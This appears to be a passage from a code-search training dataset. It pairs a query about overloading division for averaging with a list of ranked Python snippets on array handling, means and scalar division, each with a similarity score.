"def test04d(self):\n a = np.arange(1e3)\n b = bcolz.carray(a, chunklen=100, rootdir=self.rootdir)\n sl = slice(None, None, 2)\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")",
"def numpy_array(arr: Array) -> np.ndarray:\n\n if not isinstance(arr, np.ndarray):\n arr_np = np.asarray(arr)\n if isinstance(arr, (list, tuple)) and len(arr_np.shape) == 2:\n arr_np = np.transpose(arr_np)\n return arr_np\n else:\n return arr",
"def single_dimension(array: np.ndarray) -> None:\n if array.ndim > 1:\n raise ValueError(\n f\"Array was multidimensional. Must pass 1D array; found {array.ndim}\"\n )",
"def is1d(a):\n return np.sum(asarray(asarray(a).shape) > 1) <= 1",
"def lin_t_func(self):\n mat = self.precalc_mat[0]\n dim_x = self.sys[2].shape[0]\n\n return mat[1, 0, 1][dim_x:]",
"def test02(self):\n a = np.arange(101)\n b = bcolz.carray(a)\n c = b[[]]\n r = a[[]]\n assert_array_equal(c, r, \"fancy indexing does not work correctly\")",
"def getShortArray2D(self) -> typing.List[typing.List[int]]:\n ...",
"def observation(self, obs):\n\n# import pdb;pdb.set_trace()\n return np.moveaxis(obs, 2, 0)",
"def _check_array(self, X):\n x = np.copy(X)\n if np.isfortran(x) is False:\n # print (\"Array must be in Fortran-order. Converting now.\")\n x = np.asfortranarray(x)\n if self.sampling > x.shape:\n raise ValueError(\"'sampling' is greater than the dimensions of X\")\n return x",
"def com_msd_multiple_realizations(t_target_array, folder, prefix, n_realization, attrib = 'x_array'):\n #first stich together all the arrays\n #read in he first one\n file_name = prefix + \"_0\" + \".pkl\"\n file_address = os.path.join(folder, file_name)\n with open(file_address, 'rb') as input:\n dataHolder = pickle.load(input)\n x_big = getattr(dataHolder, attrib)\n t_big = dataHolder.t_array\n for i in range(1,n_realization):\n file_name = prefix + \"_\" + str(i) + \".pkl\"\n file_address = os.path.join(folder, file_name)\n with open(file_address, 'rb') as input:\n dataHolder = pickle.load(input)\n x_mat = getattr(dataHolder, attrib)\n t_mat = dataHolder.t_array\n x_big = np.vstack((x_big, x_mat))\n t_big = np.vstack((t_big, t_mat))\n out_put_size = len(t_target_array)\n com_array = np.zeros(out_put_size)\n msd_array = np.zeros(out_put_size)\n for i in range(out_put_size):\n t = t_target_array[i]\n com_array[i], msd_array[i] = com_msd_at_given_time(t, x_big, t_big)\n return com_array, msd_array",
"def process_array(arr, session):\n img = Image.fromarray(arr)\n cim_resized = img.resize((40,40), resample=Image.LANCZOS)\n n = cim_resized.convert('L')\n cropped = np.array(n).astype(np.float64)\n normalized_cropped_image = cropped - np.mean(cropped)\n normalized_cropped_image = normalized_cropped_image.reshape((-1, image_size, image_size, num_channels)).astype(np.float32)\n predicted_arr = predict_live(normalized_cropped_image, session)\n label = ''.join(['' if int(x[0]) == 10 else str(x[0]) for x in list(predicted_arr)])\n print 'NUMBER IS : ' + label",
"def SetDataVolume(vDataSet,arr,aIndexC,aIndexT):\r\n nx = vDataSet.GetSizeX()\r\n ny = vDataSet.GetSizeY()\r\n nz = vDataSet.GetSizeZ()\r\n dtype = GetType(vDataSet)\r\n\r\n if DEBUG:\r\n print(\"SetDataVolume\")\r\n print(\"vDataSet:\",(nz,ny,nx),GetType(vDataSet))\r\n print(arr.shape)\r\n print(arr.dtype)\r\n print(aIndexC)\r\n print(aIndexT)\r\n\r\n #Make sure the data is in range and convert the array\r\n s = arr\r\n if dtype != arr.dtype:\r\n miset,maset = GetTotalRange(vDataSet)\r\n arr[arr<miset]=miset\r\n arr[arr>maset]=maset\r\n s = arr.astype(dtype)\r\n\r\n if dtype == np.uint8:\r\n SetData = vDataSet.SetDataVolumeAs1DArrayBytes\r\n s = s.tostring()\r\n elif dtype == np.uint16:\r\n SetData = vDataSet.SetDataVolumeAs1DArrayShorts\r\n s = np.ravel(s)\r\n elif dtype == np.float32:\r\n SetData = vDataSet.SetDataVolumeAs1DArrayFloats\r\n s = np.ravel(s)\r\n SetData(s,aIndexC,aIndexT)\r\n\r\n if 0:\r\n #Old method slice by slice\r\n if dtype == np.uint8:\r\n SetData = vDataSet.SetDataSubVolumeAs1DArrayBytes\r\n elif dtype == np.uint16:\r\n s = np.ravel(s)\r\n SetData = vDataSet.SetDataSubVolumeAs1DArrayShorts\r\n elif dtype == np.float32:\r\n s = np.ravel(s)\r\n SetData = vDataSet.SetDataSubVolumeAs1DArrayFloats\r\n\r\n for z in range(nz):\r\n t = time.time()\r\n l = arr[z,...].swapaxes(0,1).tostring()\r\n SetData(l,0,0,z,aIndexC,aIndexT,nx,ny,1)\r\n print z,time.time()-t\r\n\r\n #vDataSet.SetChannelRange(aIndexC,miset,maset)\r",
"def transform(array):\n assert array.shape == (10, 2)\n new = Array(columns=\"abcd\")\n for x, y in array:\n new.append([x, y, x + y, x * y])\n return new",
"def _arrayCollapse(array_in, method):\n \n # Perform an numpy.array collapse along the z-axis\n if method == 'sum':\n print('(3d_collapse): Sum collapse of extracted slices ...')\n collapsed_array = np.sum(array_in, axis=0)\n \n elif method == 'mean':\n print('(3d_collapse): Mean collapse of extracted slices ...')\n collapsed_array = np.mean(array_in, axis=0)\n \n elif method == 'median':\n print('(3d_collapse): Median collapse of extracted slices ...')\n collapsed_array = np.median(array_in, axis=0)\n \n # Returns an array of type numpy.array \n return collapsed_array"
] | [
"0.582377",
"0.581599",
"0.5703788",
"0.56798375",
"0.5665006",
"0.5622838",
"0.5622838",
"0.561631",
"0.5614652",
"0.56125855",
"0.56112605",
"0.5594524",
"0.5558285",
"0.5528516",
"0.5528516",
"0.5513754",
"0.5506847",
"0.54488146",
"0.54157764",
"0.5404244",
"0.5395436",
"0.5388703",
"0.538565",
"0.53848654",
"0.5381488",
"0.5319798",
"0.5309512",
"0.530908",
"0.5292067",
"0.5282733",
"0.52671903",
"0.52671903",
"0.52671903",
"0.52671903",
"0.52478147",
"0.52454674",
"0.52351177",
"0.5225853",
"0.5216724",
"0.5201503",
"0.51918685",
"0.51917815",
"0.5188283",
"0.5183179",
"0.5171634",
"0.51666695",
"0.51612175",
"0.51444757",
"0.5136204",
"0.5133477",
"0.5117891",
"0.5103355",
"0.50895596",
"0.5086439",
"0.50817424",
"0.5074625",
"0.5064842",
"0.5061334",
"0.5045932",
"0.5045254",
"0.5032828",
"0.50300044",
"0.5029875",
"0.5025922",
"0.50244707",
"0.5015606",
"0.50153494",
"0.5010778",
"0.5010361",
"0.49933168",
"0.49922624",
"0.4989951",
"0.4986508",
"0.4986391",
"0.4985182",
"0.49807572",
"0.49777007",
"0.49723205",
"0.49699524",
"0.49685207",
"0.49637532",
"0.49631444",
"0.49627608",
"0.4956602",
"0.495197",
"0.49519342",
"0.49508312",
"0.49492353",
"0.49492076",
"0.49474296",
"0.49470362",
"0.49453074",
"0.49414185",
"0.49411428",
"0.4938209",
"0.49355054",
"0.49310136",
"0.49294138",
"0.49279794",
"0.49275273"
] | 0.5034996 | 60 |
overload + which is useful for averaging | def __add__(self, other):
return self.__class__(
{
name:
self.__getattribute__(name) + other.__getattribute__(name)
for name in self._fields
}
) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def add_mean(mean):\n return sum(mean)/len(mean)",
"def __iadd__(self,value):\n if isinstance(value,LiveStat):\n raise Exception(\"Cannot sum statistics\")\n if value.vcount < 1 or self.vcount < 1:\n raise Exception(\"Cannot sum empty statistics\")\n else:\n # sum of two considered pairwise: z_i = stat(x_i + y_i)\n #\n # data have different weights due to number of samples.. TODO\n self.vmin += value.vmin \n self.vmax += value.vmax\n self.vmean += value.vmean\n self.vsum += value.vsum\n # variance is sum of variance?\n self.vm2 += value.vm2\n # TODO vm3 vm4\n self.vcount = min(value.vcount,self.vcount)\n self.vcountsq = self.vcount**2\n self.dirty = True\n print (\"add Missing: M3 and M4\")\n else:\n # constant bias\n if self.vmin is not None:\n self.vmin += value\n self.vmax += value\n self.vmean += value\n self.vsum += self.vcount*value\n print (\"add Missing: M3 and M4\")\n self.dirty = True\n return self",
"def __add__(self,other):\n self.numerator=self.numerator*other.denominator\n other.numerator=self.denominator*other.numerator\n resultnumerator = self.numerator+other.numerator\n resultdenominator = self.denominator*other.denominator \n newvalues = (resultnumerator,resultdenominator)\n return newvalues",
"def avg(a,b):\r\n return (a+b)/2",
"def add_to_average(total_count, total_value, new_value):\n return ((1.0 * total_count * total_value) + new_value) / (total_count + 1)",
"def average(arg1, *args): \n return (arg1 + sum(args)) / (1 + len(args))",
"def average(x, y):\n #helper function for get_accuracy\n average = (x+y)/2 \n return average",
"def __iadd__(self, other):\n\n if isinstance(other, float):\n self.iadd_scalar(other)\n else:\n self.iadd(other)",
"def __add__(self, other):\n output = Spectrum(self.wavelengths, self.intensities)\n for wavelength, intensity in other:\n if output[wavelength]:\n output[wavelength] += intensity\n else:\n output[wavelength] = intensity\n return output",
"def add(self, *args):\n sum = 0\n for arg in args:\n sum += float(arg)\n return sum",
"def __add__(self, other):\n if isinstance(other, int) or isinstance(other, float):\n return Amp(self.amps + other, self.amp_unit, self.freq, self.freq_unit)\n if self.amp_unit != other.amp_unit:\n raise ArithmeticError(f\"The objects' amp units {self.amp_unit} and {other.amp_unit} are not the same.\")\n if self.freq != other.frequency:\n raise ArithmeticError(f\"The objects' frequency {self.freq} and {other.frequency} are not the same.\")\n if self.freq_unit != other.freq_unit:\n raise ArithmeticError(f\"The objects' frequency units {self.freq_unit} and {other.freq_unit} \"\n f\"are not the same.\")\n amp_sum = self.amps + other.amps\n return Amp(amp_sum, self.amp_unit, self.freq, self.freq_unit)",
"def __add__( self, other ) :\n\n try :\n other = float( other )\n c_ls = self.copy( )\n for l, c_l in enumerate( c_ls ) : c_ls.coefficients[l] += other\n except :\n self.checkSameSeriesType( other )\n c_l1, c_l2 = self, other\n if( len( self ) < len( other ) ) : c_l1, c_l2 = other, self\n c_ls = c_l1.copy( )\n for l, c_l in enumerate( c_l2 ) : c_ls.coefficients[l] += c_l\n return( c_ls )",
"def __iadd__(self, other):\n if abs(self.T - other.T) > 1E-5:\n msg = \"The two objects being added needs to have the same \"\n msg += \"temperature.\"\n raise ValueError(msg)\n\n if self.ref_value < other.ref_value:\n diff = self.ref_value - other.ref_value\n other._average *= np.exp(self.beta * diff)\n other.ref_value = self.ref_value\n else:\n diff = other.ref_value - self.ref_value\n self.ref_value = other.ref_value\n self._average *= np.exp(self.beta * diff)\n self._average += other._average\n self.num_samples += other.num_samples\n return self",
"def __add__(self, other):\n return asarray(add(self, other))",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def mean(vals):",
"def __add__(self, other):\n\n return self._binary_elementwise_op(other, np.add)",
"def __add__(self,that):\n return self.__opExpand2(that,np.add)",
"def avg(x, y):\n return (x + y)/2",
"def average(a1, a2, coord1, coord2, dim1, dim2, unit):\r\n \r\n avg = (a1 + a2)/2\r\n \r\n avg_xr = xr.DataArray(avg, coords=[coord1, coord2], dims=[dim1, dim2])\r\n avg_xr.attrs['units'] = unit\r\n \r\n return avg_xr",
"def average(data):\n return np.average(data)",
"def incremental_mean(x1, x2):\n n_a, mean_a = x1\n n_b, mean_b = x2\n n_ab = n_a + n_b # Total samples\n mean_ab = ((mean_a * n_a) + (mean_b * n_b)) / n_ab # Averaged mean\n return n_ab, mean_ab",
"def add(*args):\n #convert args to floats so we can do the maths\n values = list(args)\n for x in range(len(values)):\n values[x] = float(values[x])\n \n summation = str(ft.reduce(oper.add,values))\n return summation",
"def d_mean(x, y):\n return (x + y) / 2",
"def __add__(self, other):\n if not (isNumeric(other) or isinstance(other, Expression)):\n error_msg = (\n f'Invalid expression during addition to {self}: [{other}]'\n )\n raise excep.biogemeError(error_msg)\n return Plus(self, other)",
"def __add__(self, other):\n new_measure = Measure()\n settings = [\"raw\", \"fil\"]\n\n for rf in settings:\n new_measure.hit1[rf] = (self.hit1[rf] + other.hit1[rf])\n new_measure.hit3[rf] = (self.hit3[rf] + other.hit3[rf])\n new_measure.hit10[rf] = (self.hit10[rf] + other.hit10[rf])\n new_measure.mrr[rf] = (self.mrr[rf] + other.mrr[rf])\n new_measure.mr[rf] = (self.mr[rf] + other.mr[rf])\n return new_measure",
"def __iadd__(self, other):\n\n return self + other",
"def find_arithmetic_mean( *args):\n sum = 0\n for value in args:\n sum += value\n return sum/len(args)",
"def add(value1, value2):\n return 1 / (1.0 / value1 + 1.0 / value2)",
"def mean(self, like_params):\n\t\traise NotImplementedError",
"def __add__(self, other: Any) -> TypeValue:\n if isinstance(other, np.ndarray):\n return other + float(self)\n\n return self._like_self_from_float(\n float(self) + self._other_same_units(other)\n )",
"def __add__(self, other):\n pass",
"def __add__(self, other):\n pass",
"def average(num1, num2):\n\n return (num1 + num2) / 2",
"def get_mean(self, X):\n raise NotImplementedError",
"def avg_func(self, averaged_param: Tensor, source_param: Tensor,\n steps: int) -> None:\n averaged_param.mul_(1 - self.momentum).add_(\n source_param, alpha=self.momentum)",
"def _get_mean(self, sums, step):\n\n return sums/step",
"def __add__(self, other):\n raise NotImplementedError",
"def __add__(self, other):\n raise NotImplementedError",
"def __radd__(self, other):\n if not (isNumeric(other) or isinstance(other, Expression)):\n error_msg = (\n f'Invalid expression during addition to {self}: [{other}]'\n )\n raise excep.biogemeError(error_msg)\n return Plus(other, self)",
"def __add__(self, other):\r\n return self.add(other)",
"def __add__(self, other):\n\t\tif isinstance(other, Value):\n\t\t\treturn Value(self.val + other.val, sqrt(self.error**2 + other.error**2))\n\t\telse:\n\t\t\treturn Value(self.val + other, self.error)",
"def __add__(self, other):\n if other == 0:\n return self\n\n pmf = Pmf()\n for v1, p1 in self.items():\n for v2, p2 in other.items():\n pmf[v1 + v2] += p1 * p2\n return pmf",
"def __add__(self, other):\n return self.add(other)",
"def add(self):\n return self._do_calc(self.adder)",
"def add(self):\n return self._do_calc(self.adder)",
"def add(self):\n return self._do_calc(self.adder)",
"def __add__(self, other):\n if type(other) == int:\n other = float(other)\n\n if type(other) == float:\n other = Tensor(other)\n\n return F.Add.apply(self, other)",
"def __iadd__(self, other):\n\n other_data = self._setup_numeric(other)\n self.data[:] = self.data + other_data\n\n return self",
"def __radd__(self, other):\n return asarray(add(numpy.asarray(other), self))",
"def mean(self):\n return sum(p * x for x, p in self.items())",
"def plus(self, a, b):\n return a + b",
"def __iadd__(self, other):\n if not isinstance(other, type(self)):\n raise TypeError(\"Only DFs of the same type can be combined.\")\n self.dfs.extend(other.dfs)\n self.counts.extend(other.counts)\n self._unique = False\n self._original += other._original\n if self.label is None:\n if other.label is not None:\n self.label = other.label\n else:\n if other.label is not None:\n self.label += \"+\" + other.label\n self.tags.update(other.tags)\n self._average = None\n return self",
"def add(self,*datas):\n\t\tresult = sum(datas)\n\t\treturn result",
"def avg(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n \n return (u + v) / 2.0",
"def print_avg():",
"def average(self):\n return self.summation() / self.count()",
"def modelmean(self, model_params, this_data, this_suff_stat):\n pass",
"def mean(self):\n raise RuntimeError(\"Needs to be implemented in base class\")",
"def __add__(self,sample):\n self.add(sample)",
"def __add__(self, other: PointOrIterableOrScalar) -> PointType:\n return self.__op(other, operator.add)",
"def __add__(self, value):\r\n if isinstance(value, (int, dec.Decimal)):\r\n return self.__class__(self._real + value, self._imag)\r\n elif isinstance(value, self.__class__):\r\n return self.__class__(self._real + value._real, self._imag + value._imag)\r\n raise TypeError(\r\n 'unsupported operand type(s) for +: {!r} and {!r}'.format(\r\n self.__class__.__name__, value.__class__.__name__\r\n )\r\n )",
"def average(self):\n return (self.current + self.last) / 2.0",
"def __radd__(self, other):\n return self + other",
"def __radd__(self, other):\n return self + other",
"def extend(self,data):\n n = float(len(data))\n if n == 0:\n return self\n M2 = 0\n M3 = 0\n M4 = 0\n mean = 0\n vmin = None\n vmax = None\n for x in data:\n mean += x/n \n if vmin is None:\n vmax = x\n vmin = x\n if x < vmin:\n vmin = x\n if x > vmax:\n vmax = x\n for x in data:\n d = x-mean\n M2 += (d**2)\n M3 += (d**3)\n M4 += (d**4)\n x = LiveStat(self.name)\n x.vmin = vmin\n x.vmax = vmax\n x.vmean = mean\n x.vm2 = M2\n x.vm3 = M3\n x.vm4 = M4\n x.vcount = int(n)\n x.vcountsq = x.vcount**2\n x.dirty = True\n self.merge(x)\n return self",
"def function2(a, b):\r\n average = (a + b) / 2\r\n return average",
"def vars_add ( self , var1 , var2 , name = '' , title = '' ) :\n \n f1 = isinstance ( var1 , num_types )\n f2 = isinstance ( var2 , num_types )\n\n if f1 and f2 :\n res = float ( var1 ) + float ( var2 )\n return ROOT.RooRealConstant.value ( res ) \n elif f1 :\n ## shortcut \n if 0 == var1 : return var2 ## SHORTCUT\n #\n var1 = ROOT.RooRealConstant.value ( var1 ) \n return self.vars_add ( var1 , var2 , name , title )\n elif f2 :\n ## shortcut \n if 0 == var2 : return var1 ## SHORTCUT\n #\n var2 = ROOT.RooRealConstant.value ( var2 ) \n return self.vars_add ( var1 , var2 , name , title )\n \n self.aux_keep.append ( var1 )\n self.aux_keep.append ( var2 )\n\n result = Ostap.MoreRooFit.Addition ( var1 , var2 )\n self.aux_keep.append ( result )\n \n return result",
"def __add__(self, other):\n return add_mps(self, other)",
"def ADD (self, n1, n2):",
"def __iadd__(self, m):\n if self.__mm_type(m):\n ls=len(self)\n for i in self.desc():\n for j in range(ls):\n self.g_val(self.val(i,j)+m.val(i,j),i,j)\n return self",
"def Mean(data):\n return data.mean()",
"def findMean (*args):\r\n total = my_module.addStuff(*args)\r\n return total/len(args)",
"def __add__(self, other):\n\n self._add_sub_error_checking(other)\n if (self._counts is None) ^ (other._counts is None):\n raise SpectrumError(\n 'Addition of counts-based and CPS-based spectra is ' +\n 'ambiguous, use Spectrum(counts=specA.counts+specB.counts) ' +\n 'or Spectrum(cps=specA.cps+specB.cps) instead.')\n\n if self._counts is not None and other._counts is not None:\n kwargs = {'counts': self.counts + other.counts}\n if self.livetime and other.livetime:\n kwargs['livetime'] = self.livetime + other.livetime\n else:\n warnings.warn('Addition of counts with missing livetimes, ' +\n 'livetime was set to None.', SpectrumWarning)\n else:\n kwargs = {'cps': self.cps + other.cps}\n spect_obj = Spectrum(\n bin_edges_kev=self.bin_edges_kev, **kwargs)\n return spect_obj",
"def __add__(self, other):\n base = deepcopy(self)\n base += other # (+=) == __iadd__\n return base",
"def __iadd__(self, other: PointOrIterableOrScalar) -> PointType:\n return self.__iop(other, operator.add)",
"def __add__(self, other):\n if isinstance(other, Factorization):\n other = other.value()\n return self.value() + other",
"def get_avg_points(self):\n pass",
"def add(a,b):\n return [a[0]+b[0],a[1]+b[1],a[2]+b[2],1.0]",
"def __iadd__(self,that):\n #return self.__opExpand1(that,np.add, out=self)\n return self.__opExpand2(that,np.add, out=self)",
"def __add__(self, other):\r\n if isinstance(other, vec4):\r\n return vec4(self.x+other.x, self.y+other.y, self.z+other.z, self.w+other.w)\r\n else:\r\n raise TypeError, \"unsupported operand type for +\"",
"def __add__(self, value):\n out = self.copy()\n out.addMath(Query.Math.Add, value)\n return out",
"def avg():\n\n # call sum method to add up the values in the collection & div by the num of items\n # call len method to compute the # of vals in collection which is divided by sum total \n mean = sum(inlist) / len(inlist)\n return mean \n\n # alternate method would be calling the reduce method with lamda \n # return reduce(lambda a, b: a + b, inlist) / len(inlist)",
"def forward_avg(array_in):\n return (array_in[:-1] + array_in[1:]) * 0.5",
"def __radd__(self,that):\n return self.__opExpand2(that,np.add)",
"def __add__(self, other):\n top = self.num*other.denom + self.denom*other.num\n bott = self.denom*other.denom\n return fraction(top, bott)",
"def __iadd__(self, other):\r\n if isinstance(other, vec4):\r\n self.x+=other.x\r\n self.y+=other.y\r\n self.z+=other.z\r\n self.w+=other.w\r\n return self\r\n else:\r\n raise TypeError, \"unsupported operand type for +=\"",
"def _add(self, other):\n raise NotImplementedError(\n \"{} does not support addition\".format(type(self)))",
"def pairmean(self, X, Y):\n raise NotImplementedError",
"def __add__(self, other):\n if isinstance(other, int) or isinstance(other, float):\n return Volt(self.volts + other, self.volt_unit, self.freq, self.freq_unit)\n if self.volt_unit != other.volt_unit:\n raise ArithmeticError(f\"The objects' volt units {self.volt_unit} and {other.volt_unit} are not the same.\")\n if self.freq != other.frequency:\n raise ArithmeticError(f\"The objects' frequency {self.freq} and {other.frequency} are not the same.\")\n if self.freq_unit != other.freq_unit:\n raise ArithmeticError(f\"The objects' frequency units {self.freq_unit} and {other.freq_unit} \"\n f\"are not the same.\")\n volt_sum = self.volts + other.volts\n return Volt(volt_sum, self.volt_unit, self.freq, self.freq_unit)",
"def __add__(self, other):\n cls = self.__class__\n return cls(self.x+other.x, self.y+other.y, self.z+other.z)",
"def __iadd__(self, other):\n raise NotImplementedError(\"Implement this if needed\")",
"def __add__(self,other):\n if isinstance(other, point):\n return self.add_points(other)\n else:\n return self.add_points_tuple(other)",
"def get_mean(self):\n self.meanval = np.mean(self.adulist)",
"def average(self, start, end):\n return self.integrate(start, end) / (end - start)",
"def __add__(self, other):\n\n result = Gaussian(mu=0, sigma=0)\n result.mu = self.mu + other.mu\n result.sigma = math.sqrt(self.sigma ** 2 + other.sigma ** 2)\n return result",
"def average(self):\n s = self.sum()\n flat_shape = self.flatten_shape(self.shape)\n num_of_elements = fct.reduce(opr.mul, flat_shape, 1)\n average = s / num_of_elements\n return average",
"def _mean(self,gp):\r\n return self.gp_link.transf(gp)",
"def _mean(self,gp):\r\n return self.gp_link.transf(gp)",
"def _mean(self,gp):\r\n return self.gp_link.transf(gp)"
] | [
"0.6968986",
"0.65940183",
"0.6575654",
"0.65746444",
"0.65079343",
"0.6471456",
"0.6436682",
"0.6430517",
"0.63915634",
"0.6386282",
"0.63346887",
"0.6332834",
"0.6318238",
"0.630995",
"0.63077843",
"0.63077843",
"0.62997144",
"0.6263618",
"0.62484145",
"0.6190253",
"0.61901087",
"0.6177614",
"0.61772394",
"0.6173142",
"0.61563313",
"0.6153058",
"0.6147462",
"0.61280227",
"0.61213803",
"0.6107852",
"0.6102746",
"0.6097704",
"0.60961413",
"0.60961413",
"0.6085084",
"0.6084174",
"0.60841405",
"0.60778",
"0.60578424",
"0.60578424",
"0.60482866",
"0.60417604",
"0.6030897",
"0.60300344",
"0.6020912",
"0.60116285",
"0.60116285",
"0.60116285",
"0.60070336",
"0.5994745",
"0.59900314",
"0.59880596",
"0.59792966",
"0.5974576",
"0.59650004",
"0.5962845",
"0.59600735",
"0.5958396",
"0.595809",
"0.5957704",
"0.5955476",
"0.5954642",
"0.59499013",
"0.5947199",
"0.5947073",
"0.5947073",
"0.59461105",
"0.5945545",
"0.593843",
"0.5935355",
"0.59220076",
"0.5921327",
"0.59149987",
"0.591168",
"0.5910612",
"0.59062356",
"0.5904224",
"0.5903234",
"0.59031504",
"0.58931905",
"0.589156",
"0.58845735",
"0.5883657",
"0.58789134",
"0.58696395",
"0.5867345",
"0.5865612",
"0.58559126",
"0.5855757",
"0.58553934",
"0.5854699",
"0.5853732",
"0.5851404",
"0.58501023",
"0.5838953",
"0.58340645",
"0.5828206",
"0.5826204",
"0.5820345",
"0.5820345",
"0.5820345"
] | 0.0 | -1 |
overload / for scalars which is useful for averaging | def __truediv__(self, number):
return self.__class__(
{
name:
self.__getattribute__(name) / number
for name in self._fields
}
) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def mean(vals):",
"def avg(a,b):\r\n return (a+b)/2",
"def scalar_function(x, y):\n if x <= y:\n return x*y\n else:\n return x/y",
"def mean(values):\r\n return sum(values) / float(len(values))",
"def avg(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n \n return (u + v) / 2.0",
"def mean(*a):\n return numpy.mean(*a) # pylint: disable=no-value-for-parameter",
"def mean(arr) -> float:\n return sum(arr) / len(arr)",
"def numeric(*args):",
"def mean(v):\n return sum(v)/len(v)",
"def mean(x):\n return sum(x) / len(x)",
"def mean_value( values ):\n return sum( values ) / len( values )",
"def mean(x):\n return sum(x)/len(x)",
"def mean(series):\n return fsum(series) / len(series)",
"def avg(x, y):\n return (x + y)/2",
"def average(arg1, *args): \n return (arg1 + sum(args)) / (1 + len(args))",
"def calc_mean(sig):\n # m = mean(sig)\n return np.mean(sig)",
"def scalar_function(x, y):\n #Your code here\n if x<=y:\n fs = x*y\n else:\n fs = x/y\n return fs\n raise NotImplementedError",
"def d_mean(x, y):\n return (x + y) / 2",
"def avg(values):\n return sum(values) / float(len(values))",
"def find_arithmetic_mean( *args):\n sum = 0\n for value in args:\n sum += value\n return sum/len(args)",
"def mean(values):\n # Write the mean() function\n mean = sum(values) / len(values)\n return mean",
"def __truediv__(self, scalar):\n return self.div(scalar)",
"def is_scalar(self):",
"def my_mean(x):\n return my_sum(x) / my_len(x)",
"def test_mixeddiv():\r\n i = iscalar()\r\n d = dscalar()\r\n assert 0 == function([i, d], d * (i // (i + 1)))(3, 1.0)",
"def mean(values):\n # Write the mean() function\n mean = sum(values) / len(values)\n return mean",
"def mean(values):\n total = sum(values)\n len_values = len(values)\n return total/len_values",
"def _mean(items):\n return sum(items) / len(items)",
"def avg(arr):\n return sum(arr) / float(len(arr))",
"def average(values):\n return sum(values) / len(values)",
"def average(values):\n return sum(values) / len(values)",
"def average(values):\n\treturn sum(values)/len(values)",
"def average(data):\n return np.average(data)",
"def ave(values):\n return float(sum(values))/len(values)",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def scalar():\n # noinspection PyUnusedLocal\n def sf(x, params, const_list, const_dict):\n a = params[0]\n return a\n return FitFunction(func=sf, num_fit_params=1, name='scalar', code='s')",
"def ageometricmean (inarray,dimension=None,keepdims=0):\r\n inarray = N.array(inarray,N.float_)\r\n if dimension == None:\r\n inarray = N.ravel(inarray)\r\n size = len(inarray)\r\n mult = N.power(inarray,1.0/size)\r\n mult = N.multiply.reduce(mult)\r\n elif type(dimension) in [IntType,FloatType]:\r\n size = inarray.shape[dimension]\r\n mult = N.power(inarray,1.0/size)\r\n mult = N.multiply.reduce(mult,dimension)\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n shp[dimension] = 1\r\n sum = N.reshape(sum,shp)\r\n else: # must be a SEQUENCE of dims to average over\r\n dims = list(dimension)\r\n dims.sort()\r\n dims.reverse()\r\n size = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.float_)\r\n mult = N.power(inarray,1.0/size)\r\n for dim in dims:\r\n mult = N.multiply.reduce(mult,dim)\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n for dim in dims:\r\n shp[dim] = 1\r\n mult = N.reshape(mult,shp)\r\n return mult",
"def AVERAGE(nums):\n if type(nums) == list or type(nums) == np.ndarray:\n return(np.mean(nums))\n else:\n print('Invalid type: nums needs to be a list or numpy array.')",
"def har_mean(array):\n return ((sum([1/x for x in array]))**(-1))*len(array)",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))",
"def mean(self):\n\t\treturn 0. #obtained by integrating 1.5x^3 from -1 to 1",
"def _mean(listvalue):\n\treturn sum(listvalue)/len(listvalue)",
"def find_mean(values):\n return sum(values) / len(values)",
"def numerator(self, ???):",
"def geometric_mean(xs):\n p = 1.0\n for num in xs:\n p = p * num\n return (p)**(1.0/len(xs))",
"def average(self):\n s = self.sum()\n flat_shape = self.flatten_shape(self.shape)\n num_of_elements = fct.reduce(opr.mul, flat_shape, 1)\n average = s / num_of_elements\n return average",
"def numpy_mean(arr):\n return arr.mean()",
"def mean_square_value( values ):\n return sum( [ i**2 for i in values] ) / len( values )",
"def __itruediv__(self, scalar):\n return self.div_(scalar)",
"def test_mean_custom_dtype(self):\r\n # We try multiple axis combinations even though axis should not matter.\r\n axes = [None, 0, 1, [], [0], [1], [0, 1]]\r\n idx = 0\r\n for input_dtype in imap(str, theano.scalar.all_types):\r\n x = tensor.matrix(dtype=input_dtype)\r\n for sum_dtype in imap(str, theano.scalar.all_types):\r\n axis = axes[idx % len(axes)]\r\n # If the inner sum cannot be created, it will raise a\r\n # TypeError.\r\n try:\r\n mean_var = x.mean(dtype=sum_dtype, axis=axis)\r\n except TypeError:\r\n pass\r\n else:\r\n # Executed if no TypeError was raised\r\n if sum_dtype in tensor.discrete_dtypes and axis != []:\r\n assert mean_var.dtype == 'float64', (\r\n (mean_var.dtype, sum_dtype))\r\n else:\r\n assert mean_var.dtype == sum_dtype, (\r\n (mean_var.dtype, sum_dtype))\r\n if (('complex' in input_dtype or\r\n 'complex' in sum_dtype) and\r\n input_dtype != sum_dtype):\r\n continue\r\n f = theano.function([x], mean_var)\r\n data = numpy.random.rand(3, 4) * 10\r\n data = data.astype(input_dtype)\r\n f(data)\r\n # Check that we can take the gradient, when implemented\r\n if \"complex\" in mean_var.dtype:\r\n continue\r\n try:\r\n tensor.grad(mean_var.sum(), x,\r\n disconnected_inputs='ignore')\r\n except NotImplementedError:\r\n # TrueDiv does not seem to have a gradient when\r\n # the numerator is complex.\r\n if mean_var.dtype in tensor.complex_dtypes:\r\n pass\r\n else:\r\n raise\r\n\r\n idx += 1",
